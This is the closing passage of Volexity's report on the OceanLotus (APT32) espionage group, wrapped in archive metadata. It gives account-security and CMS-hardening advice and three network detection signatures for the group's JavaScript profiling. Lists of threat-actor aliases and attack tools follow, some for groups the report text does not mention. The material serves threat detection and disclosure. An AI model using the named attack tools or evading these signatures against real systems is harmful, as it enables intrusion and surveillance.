It is possible to\r\ndefend against unauthorized applications and increase a Google Accounts security through the Google Advanced\r\nProtection Program as well\r\nUsers can further verify what Google Apps and devices are accessing their account via the following steps:\r\nhttps://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/\r\nPage 19 of 20\n\nLog into Gmail from a web browser via https://mail.google.com\r\nScroll to the bottom of the page and click Details to see a list of recent accesses to the account\r\nIf any access stands out as coming from an unauthorized application or address, the guidance in the steps on the\r\nfollowing page should be reviewed:\r\nhttps://support.google.com/mail/answer/7036019\r\nFinally, for website administrators, the key recommendations are as follows:\r\nUse strong passwords for CMS and system authentication\r\nRestrict access to the system and CMS functionality as much as possible (limited users, ACLs, etc.)\r\nImplement two-factor (2FA) where possible\r\nKeep operating systems, CMS software, and CMS plugins up-to-date\r\nDisable or remove any accounts that are no longer needed or are unrecognized\r\nNetwork Signatures\r\nIn addition to the domains and IP addresses, the following network signatures can be used to detect various\r\nOceanLotus profiling and targeting activity.\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:”Volex – OceanLotus JavaScript Load\r\n(connect.js)”; flow:to_server,established; content:”GET”; http_method; content:”connect.js?\r\ntimestamp=”; http_uri; sid:2017083001; )\r\nalert http $EXTERNAL_NET any -\u003e $HOME_NET any (msg:”Volex – OceanLotus JavaScript Fake\r\nPage URL Builder Response”; flow:to_client,established; file_data;content:”{|22|link|22|:|22|http”;\r\ndepth:13; file_data; content:”|22|load|22|”; sid:2017083002; rev:1;)\r\nalert http $EXTERNAL_NET any -\u003e $HOME_NET any 
(msg:\"Volex – OceanLotus System Profiling JavaScript (linkStorage.x00SOCKET)\"; flow:to_client,established; file_data; content:\"linkStorage.x00SOCKET\"; sid:2017083003;)\r\nConclusion\r\nVolexity believes the OceanLotus threat group has rapidly advanced its capabilities and is now one of the more sophisticated APT actors currently in operation. While Volexity does not typically engage in attribution of threat actors, it agrees with previously reported assessments that OceanLotus is likely operating out of Vietnam, largely because the extreme and wide-scale nature of certain targeting would be very unlikely to align with the interests of anyone outside Vietnam. In sum, Volexity assesses that OceanLotus has been rapidly developing a highly skilled and organized computer network exploitation (CNE) capability.\r\nSource: https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/"
	],
	"report_names": [
		"oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"ITG12",
				"KRYPTON",
				"MAKERSMARK",
				"Pensive Ursa",
				"Secret Blizzard",
				"Turla",
				"UAC-0003",
				"UAC-0024",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium",
				"Carbanak",
				"Carbon Spider",
				"FIN7",
				"Navigator",
				"Sangria Tempest",
				"TelePort Crew"
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN"
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434515,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3264963acb73ff23add60985ee4d3814b2358a58.pdf",
		"text": "https://archive.orkl.eu/3264963acb73ff23add60985ee4d3814b2358a58.txt",
		"img": "https://archive.orkl.eu/3264963acb73ff23add60985ee4d3814b2358a58.jpg"
	}
}